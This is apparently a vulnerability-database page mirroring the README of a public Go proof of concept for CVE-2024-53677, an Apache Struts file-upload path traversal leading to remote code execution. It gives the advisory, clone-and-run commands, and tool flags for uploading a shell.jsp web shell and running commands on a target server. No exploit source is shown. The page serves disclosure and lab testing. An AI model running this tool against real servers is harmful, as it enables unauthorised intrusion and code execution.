CVE-2024-53677 PoC — Apache Struts: Mixing setters for uploaded files and normal fields can allow bypass file upload checks

Source

https://github.com/Cythonic1/CVE-2024-53677-POC

Associated Vulnerability

Title:Apache Struts: Mixing setters for uploaded files and normal fields can allow bypass file upload checks (CVE-2024-53677)
Description:File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. This issue affects Apache Struts: from 2.0.0 before 6.4.0. Users are recommended to upgrade to version 6.4.0 at least and migrate to the new file upload mechanism https://struts.apache.org/core-developers/file-upload . If you are not using an old file upload logic based on FileuploadInterceptor your application is safe. You can find more details in https://cwiki.apache.org/confluence/display/WW/S2-067

Description

a proof of concept of CVE-2024-53677

Readme

#   CVE-2024-53677
A kind old vulnerability that effect `Apache Struts` leading to LFI, and remote exection.

## more info about the vulnerability you can refer to this great blog.

[Apache Struts path traversal → RCE (CVE-2024-53677)](https://www.sonicwall.com/blog/apache-struts-path-traversal-to-rce-cve-2024-53677)

## POC usage
I have send much time make this as custamizable as possiable because when i first encounter this CVE did not find a good source that implement it correctly.
Most of the flags have a default values so do not be discourage with all of these flags.

```bash
git clone https://github.com/Cythonic1/CVE-2024-53677-POC
cd  CVE-2024-53677-POC
go run . -h
```

```bash

  -command string
        command to execute on the server default: whoami
  -end-point string
        post endpoint default to: upload.action
  -file-location string
        where to save the file into the server default: what test function return
  -lfi-param string
        Parameter name for LFI testing default: top.UploadFileName
  -payload-file string
        Path to the payload file default: ./shell.jsp
  -payload-file-name string
        name of the payload it self default: shell.jsp
  -payload-param string
        Parameter name for payload injection default: Upload
  -test-file-name string
        name of the testfile it self default: testfile.txt
  -testing-file string
        File used for testing default: ./testfile.txt
  -url string
        Target base URL (format http://strutted.htb/) do not forgot the [/] at the end
```
All of these commands has defaults values. I also implement a testing function to check where the file should be put and it also a user configurable options.

### Basic usage
```bash
go run .  -url http://127.0.0.1:8080/ -end-point upload.action
```


# NOTES.
Few things to note.
1. The default payload is GIF format and the content type is gif if it need to be change this is the only option where you have to change the code.
2. The test function may produce wrong assumption so do not relay on it 100%.
3. yo may need to run the exploit more than once at least twice because i notice when it first time uploaded the payload it did not find it on the very next request
So keep that in mind.

# Contributions.
Feel free to modifie or add on the exploit ♥️.

# Resources.
[Vulnerable docker image](https://github.com/cloudwafs/s2-067-CVE-2024-53677/tree/main)
[more info about the exploit](https://www.sonicwall.com/blog/apache-struts-path-traversal-to-rce-cve-2024-53677)

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!